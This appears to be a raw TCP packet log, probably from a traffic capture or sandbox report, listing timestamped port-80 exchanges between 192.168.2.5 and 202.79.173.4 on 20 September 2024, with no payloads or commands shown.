                                                              Sep 20, 2024 12:00:34.800322056 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:34.800332069 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:34.800344944 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:34.800362110 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:34.800368071 CEST4972580192.168.2.5202.79.173.4
                                                              Sep 20, 2024 12:00:34.800378084 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:34.800384045 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:34.800390005 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:34.800395966 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:34.800407887 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:34.800409079 CEST4972580192.168.2.5202.79.173.4
                                                              Sep 20, 2024 12:00:34.800434113 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:34.800441027 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:34.800445080 CEST4972580192.168.2.5202.79.173.4
                                                              Sep 20, 2024 12:00:34.800499916 CEST4972580192.168.2.5202.79.173.4
                                                              Sep 20, 2024 12:00:34.800854921 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:34.800870895 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:34.800875902 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:34.800935984 CEST4972580192.168.2.5202.79.173.4
                                                              Sep 20, 2024 12:00:34.801440001 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:34.801450968 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:34.801465034 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:34.801470041 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:34.801527977 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:34.801537991 CEST4972580192.168.2.5202.79.173.4
                                                              Sep 20, 2024 12:00:34.801553965 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:34.801605940 CEST4972580192.168.2.5202.79.173.4
                                                              Sep 20, 2024 12:00:34.802670002 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:34.802690983 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:34.802701950 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:34.802711964 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:34.802736998 CEST4972580192.168.2.5202.79.173.4
                                                              Sep 20, 2024 12:00:34.802789927 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:34.802798986 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:34.802843094 CEST4972580192.168.2.5202.79.173.4
                                                              Sep 20, 2024 12:00:34.802872896 CEST4972580192.168.2.5202.79.173.4
                                                              Sep 20, 2024 12:00:34.803903103 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:34.803920984 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:34.803930998 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:34.803940058 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:34.803946018 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:34.803972960 CEST4972580192.168.2.5202.79.173.4
                                                              Sep 20, 2024 12:00:34.804016113 CEST4972580192.168.2.5202.79.173.4
                                                              Sep 20, 2024 12:00:34.804933071 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:34.804977894 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:34.804986000 CEST4972580192.168.2.5202.79.173.4
                                                              Sep 20, 2024 12:00:34.804996014 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:34.805007935 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:34.805017948 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:34.805037975 CEST4972580192.168.2.5202.79.173.4
                                                              Sep 20, 2024 12:00:34.805058956 CEST4972580192.168.2.5202.79.173.4
                                                              Sep 20, 2024 12:00:34.806029081 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:34.806077957 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:34.806087017 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:34.806096077 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:34.806123018 CEST4972580192.168.2.5202.79.173.4
                                                              Sep 20, 2024 12:00:34.806149960 CEST4972580192.168.2.5202.79.173.4
                                                              Sep 20, 2024 12:00:34.806170940 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:34.806181908 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:34.806190014 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:34.806216002 CEST4972580192.168.2.5202.79.173.4
                                                              Sep 20, 2024 12:00:34.807303905 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:34.807329893 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:34.807339907 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:34.807359934 CEST4972580192.168.2.5202.79.173.4
                                                              Sep 20, 2024 12:00:34.807384014 CEST4972580192.168.2.5202.79.173.4
                                                              Sep 20, 2024 12:00:34.807452917 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:34.807478905 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:34.807487965 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:34.807550907 CEST4972580192.168.2.5202.79.173.4
                                                              Sep 20, 2024 12:00:34.808470964 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:34.808489084 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:34.808500051 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:34.808526993 CEST4972580192.168.2.5202.79.173.4
                                                              Sep 20, 2024 12:00:34.808546066 CEST4972580192.168.2.5202.79.173.4
                                                              Sep 20, 2024 12:00:34.808556080 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:34.808569908 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:34.808579922 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:34.808628082 CEST4972580192.168.2.5202.79.173.4
                                                              Sep 20, 2024 12:00:34.809719086 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:34.809731007 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:34.809777021 CEST4972580192.168.2.5202.79.173.4
                                                              Sep 20, 2024 12:00:34.809907913 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:34.809917927 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:34.809923887 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:34.809964895 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:34.809995890 CEST4972580192.168.2.5202.79.173.4
                                                              Sep 20, 2024 12:00:34.810808897 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:34.810857058 CEST4972580192.168.2.5202.79.173.4
                                                              Sep 20, 2024 12:00:34.810864925 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:34.810892105 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:34.810920954 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:34.810930967 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:34.810935974 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:34.810950994 CEST4972580192.168.2.5202.79.173.4
                                                              Sep 20, 2024 12:00:34.810983896 CEST4972580192.168.2.5202.79.173.4
                                                              Sep 20, 2024 12:00:34.812009096 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:34.812058926 CEST4972580192.168.2.5202.79.173.4
                                                              Sep 20, 2024 12:00:34.812066078 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:34.812077045 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:34.812091112 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:34.812096119 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:34.812104940 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:34.812143087 CEST4972580192.168.2.5202.79.173.4
                                                              Sep 20, 2024 12:00:34.812170029 CEST4972580192.168.2.5202.79.173.4
                                                              Sep 20, 2024 12:00:34.813246965 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:34.813270092 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:34.813280106 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:34.813306093 CEST4972580192.168.2.5202.79.173.4
                                                              Sep 20, 2024 12:00:34.813364029 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:34.813375950 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:34.813376904 CEST4972580192.168.2.5202.79.173.4
                                                              Sep 20, 2024 12:00:34.813431025 CEST4972580192.168.2.5202.79.173.4
                                                              Sep 20, 2024 12:00:34.886985064 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:34.887012959 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:34.887109995 CEST4972580192.168.2.5202.79.173.4
                                                              Sep 20, 2024 12:00:35.021682978 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:35.021748066 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:35.021784067 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:35.021816969 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:35.021850109 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:35.021855116 CEST4972580192.168.2.5202.79.173.4
                                                              Sep 20, 2024 12:00:35.021883011 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:35.021887064 CEST4972580192.168.2.5202.79.173.4
                                                              Sep 20, 2024 12:00:35.021919012 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:35.021925926 CEST4972580192.168.2.5202.79.173.4
                                                              Sep 20, 2024 12:00:35.021953106 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:35.022001028 CEST4972580192.168.2.5202.79.173.4
                                                              Sep 20, 2024 12:00:35.022010088 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:35.022042990 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:35.022075891 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:35.022084951 CEST4972580192.168.2.5202.79.173.4
                                                              Sep 20, 2024 12:00:35.022109985 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:35.022141933 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:35.022151947 CEST4972580192.168.2.5202.79.173.4
                                                              Sep 20, 2024 12:00:35.022176027 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:35.022211075 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:35.022218943 CEST4972580192.168.2.5202.79.173.4
                                                              Sep 20, 2024 12:00:35.022324085 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:35.022373915 CEST4972580192.168.2.5202.79.173.4
                                                              Sep 20, 2024 12:00:35.022681952 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:35.022749901 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:35.022784948 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:35.022795916 CEST4972580192.168.2.5202.79.173.4
                                                              Sep 20, 2024 12:00:35.022818089 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:35.022850990 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:35.022861958 CEST4972580192.168.2.5202.79.173.4
                                                              Sep 20, 2024 12:00:35.022885084 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:35.022933960 CEST4972580192.168.2.5202.79.173.4
                                                              Sep 20, 2024 12:00:35.023902893 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:35.023936033 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:35.023968935 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:35.023984909 CEST4972580192.168.2.5202.79.173.4
                                                              Sep 20, 2024 12:00:35.024002075 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:35.024035931 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:35.024044991 CEST4972580192.168.2.5202.79.173.4
                                                              Sep 20, 2024 12:00:35.025070906 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:35.025120020 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:35.025121927 CEST4972580192.168.2.5202.79.173.4
                                                              Sep 20, 2024 12:00:35.025152922 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:35.025185108 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:35.025197983 CEST4972580192.168.2.5202.79.173.4
                                                              Sep 20, 2024 12:00:35.025233984 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:35.025264978 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:35.025275946 CEST4972580192.168.2.5202.79.173.4
                                                              Sep 20, 2024 12:00:35.026092052 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:35.026139975 CEST4972580192.168.2.5202.79.173.4
                                                              Sep 20, 2024 12:00:35.026163101 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:35.026215076 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:35.026269913 CEST4972580192.168.2.5202.79.173.4
                                                              Sep 20, 2024 12:00:35.026269913 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:35.026304960 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:35.026338100 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:35.026350975 CEST4972580192.168.2.5202.79.173.4
                                                              Sep 20, 2024 12:00:35.027640104 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:35.027688980 CEST4972580192.168.2.5202.79.173.4
                                                              Sep 20, 2024 12:00:35.027710915 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:35.027744055 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:35.027775049 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:35.027793884 CEST4972580192.168.2.5202.79.173.4
                                                              Sep 20, 2024 12:00:35.027808905 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:35.027857065 CEST4972580192.168.2.5202.79.173.4
                                                              Sep 20, 2024 12:00:35.028706074 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:35.028795958 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:35.028830051 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:35.028845072 CEST4972580192.168.2.5202.79.173.4
                                                              Sep 20, 2024 12:00:35.028862953 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:35.028897047 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:35.028907061 CEST4972580192.168.2.5202.79.173.4
                                                              Sep 20, 2024 12:00:35.029802084 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:35.029855013 CEST4972580192.168.2.5202.79.173.4
                                                              Sep 20, 2024 12:00:35.029890060 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:35.029932976 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:35.029966116 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:35.029978991 CEST4972580192.168.2.5202.79.173.4
                                                              Sep 20, 2024 12:00:35.029999018 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:35.030042887 CEST4972580192.168.2.5202.79.173.4
                                                              Sep 20, 2024 12:00:35.030050993 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:35.030991077 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:35.031030893 CEST4972580192.168.2.5202.79.173.4
                                                              Sep 20, 2024 12:00:35.031064987 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:35.031116962 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:35.031156063 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:35.031164885 CEST4972580192.168.2.5202.79.173.4
                                                              Sep 20, 2024 12:00:35.031191111 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:35.031239986 CEST4972580192.168.2.5202.79.173.4
                                                              Sep 20, 2024 12:00:35.032136917 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:35.032188892 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:35.032237053 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:35.032241106 CEST4972580192.168.2.5202.79.173.4
                                                              Sep 20, 2024 12:00:35.032325983 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:35.032358885 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:35.032378912 CEST4972580192.168.2.5202.79.173.4
                                                              Sep 20, 2024 12:00:35.032407045 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:35.032460928 CEST4972580192.168.2.5202.79.173.4
                                                              Sep 20, 2024 12:00:35.033359051 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:35.033413887 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:35.033461094 CEST4972580192.168.2.5202.79.173.4
                                                              Sep 20, 2024 12:00:35.033467054 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:35.033499002 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:35.033531904 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:35.033560038 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:35.033560038 CEST4972580192.168.2.5202.79.173.4
                                                              Sep 20, 2024 12:00:35.033606052 CEST4972580192.168.2.5202.79.173.4
                                                              Sep 20, 2024 12:00:35.034543037 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:35.034574986 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:35.034607887 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:35.034616947 CEST4972580192.168.2.5202.79.173.4
                                                              Sep 20, 2024 12:00:35.034641027 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:35.034687996 CEST4972580192.168.2.5202.79.173.4
                                                              Sep 20, 2024 12:00:35.035072088 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:35.035641909 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:35.035711050 CEST4972580192.168.2.5202.79.173.4
                                                              Sep 20, 2024 12:00:35.037398100 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:35.037414074 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:35.037427902 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:35.037472010 CEST4972580192.168.2.5202.79.173.4
                                                              Sep 20, 2024 12:00:35.037476063 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:35.037492990 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:35.037509918 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:35.037520885 CEST4972580192.168.2.5202.79.173.4
                                                              Sep 20, 2024 12:00:35.037524939 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:35.037539959 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:35.037554026 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:35.037564993 CEST4972580192.168.2.5202.79.173.4
                                                              Sep 20, 2024 12:00:35.037570000 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:35.037581921 CEST4972580192.168.2.5202.79.173.4
                                                              Sep 20, 2024 12:00:35.037585974 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:35.037611961 CEST4972580192.168.2.5202.79.173.4
                                                              Sep 20, 2024 12:00:35.038444042 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:35.038460970 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:35.038503885 CEST4972580192.168.2.5202.79.173.4
                                                              Sep 20, 2024 12:00:35.038619995 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:35.038636923 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:35.038651943 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:35.038666964 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:35.038671017 CEST4972580192.168.2.5202.79.173.4
                                                              Sep 20, 2024 12:00:35.038692951 CEST4972580192.168.2.5202.79.173.4
                                                              Sep 20, 2024 12:00:35.039733887 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:35.039750099 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:35.039767027 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:35.039782047 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:35.039796114 CEST4972580192.168.2.5202.79.173.4
                                                              Sep 20, 2024 12:00:35.039798021 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:35.039822102 CEST4972580192.168.2.5202.79.173.4
                                                              Sep 20, 2024 12:00:35.039850950 CEST4972580192.168.2.5202.79.173.4
                                                              Sep 20, 2024 12:00:35.040703058 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:35.040718079 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:35.040749073 CEST4972580192.168.2.5202.79.173.4
                                                              Sep 20, 2024 12:00:35.040885925 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:35.040906906 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:35.040914059 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:35.040946007 CEST4972580192.168.2.5202.79.173.4
                                                              Sep 20, 2024 12:00:35.045440912 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:35.045454025 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:35.045469046 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:35.045509100 CEST4972580192.168.2.5202.79.173.4
                                                              Sep 20, 2024 12:00:35.045521975 CEST4972580192.168.2.5202.79.173.4
                                                              Sep 20, 2024 12:00:35.069974899 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:35.069991112 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:35.069999933 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:35.070007086 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:35.070022106 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:35.070034027 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:35.070041895 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:35.070055008 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:35.070069075 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:35.070082903 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:35.070096970 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:35.070110083 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:35.070117950 CEST4972580192.168.2.5202.79.173.4
                                                              Sep 20, 2024 12:00:35.070125103 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:35.070139885 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:35.070152998 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:35.070163965 CEST4972580192.168.2.5202.79.173.4
                                                              Sep 20, 2024 12:00:35.070168018 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:35.070183992 CEST4972580192.168.2.5202.79.173.4
                                                              Sep 20, 2024 12:00:35.070188046 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:35.070203066 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:35.070211887 CEST4972580192.168.2.5202.79.173.4
                                                              Sep 20, 2024 12:00:35.070219040 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:35.070233107 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:35.070247889 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:35.070247889 CEST4972580192.168.2.5202.79.173.4
                                                              Sep 20, 2024 12:00:35.070272923 CEST4972580192.168.2.5202.79.173.4
                                                              Sep 20, 2024 12:00:35.108270884 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:35.108340025 CEST4972580192.168.2.5202.79.173.4
                                                              Sep 20, 2024 12:00:35.111702919 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:35.111718893 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:35.111773968 CEST4972580192.168.2.5202.79.173.4
                                                              Sep 20, 2024 12:00:37.222985029 CEST4972680192.168.2.5202.79.173.4
                                                              Sep 20, 2024 12:00:37.290287971 CEST8049726202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:37.290394068 CEST4972680192.168.2.5202.79.173.4
                                                              Sep 20, 2024 12:00:37.291074991 CEST4972680192.168.2.5202.79.173.4
                                                              Sep 20, 2024 12:00:37.295974970 CEST8049726202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:38.175915003 CEST8049726202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:38.179241896 CEST4972680192.168.2.5202.79.173.4
                                                              Sep 20, 2024 12:00:38.184240103 CEST8049726202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:38.184343100 CEST8049726202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:38.184448004 CEST8049726202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:38.494628906 CEST8049726202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:38.495687008 CEST8049726202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:38.495862961 CEST4972680192.168.2.5202.79.173.4
                                                              Sep 20, 2024 12:00:38.496098042 CEST8049726202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:38.498300076 CEST8049726202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:38.498317957 CEST8049726202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:38.498348951 CEST4972680192.168.2.5202.79.173.4
                                                              Sep 20, 2024 12:00:38.503135920 CEST8049726202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:38.503154039 CEST8049726202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:38.503186941 CEST4972680192.168.2.5202.79.173.4
                                                              Sep 20, 2024 12:00:38.507920027 CEST8049726202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:38.507936001 CEST8049726202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:38.507970095 CEST4972680192.168.2.5202.79.173.4
